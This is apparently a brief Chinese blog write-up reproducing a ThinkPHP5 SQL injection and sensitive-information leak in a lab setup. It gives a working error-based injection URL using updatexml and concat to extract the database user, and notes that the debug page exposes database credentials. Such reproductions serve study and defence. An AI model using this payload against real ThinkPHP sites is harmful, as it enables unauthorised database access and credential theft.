ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

启动后，访问http://10.10.10.154/index.php?ids[]=1&ids[]=2，即可看到用户名被显示了出来，说明环境运行成功。

漏洞利用
访问http://10.10.10.154/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1，信息成功被爆出：

当然，这是一个比较鸡肋的SQL注入漏洞，但通过DEBUG页面，我们找到了数据库的账号、密码：

这又属于一个敏感信息泄露问题。

本栏目推荐文章
• openpyxl模块---------------------------------------------提取身份证信息及计算年龄
• thinkphp 便捷关联简写
• Flex&Bison
• OFBiz RCE漏洞复现（CVE-2023-51467）
• JFinal学生信息管理系统
• 【LeetCode 2701. 连续递增交易】MySQL用户变量编程得到严格递增连续子序列的开始位置，结束位置，长度等统计信息
• 初中信息奥赛模拟测试
• Windows Server 2016 & 2019 工作站速配脚本
• Qt/C++编写视频监控系统83-自定义悬浮条信息
• 软件构造大作业 综合信息管理系统

漏洞 ThinkPHP5 amp ThinkPHP 信息漏洞thinkphp5 amp thinkphp 漏洞分析 漏洞thinkphp5 thinkphp 漏洞thinkphp5 thinkphp代码 thinkphp5 thinkphp5 weblogic thinkphp thinkphp5框架thinkphp数据库 thinkphp5 thinkphp接口 数据 thinkphp thinkphp3 thinkphp5常用 thinkphp5 thinkphp sdk htmlentities thinkphp5 parameter thinkphp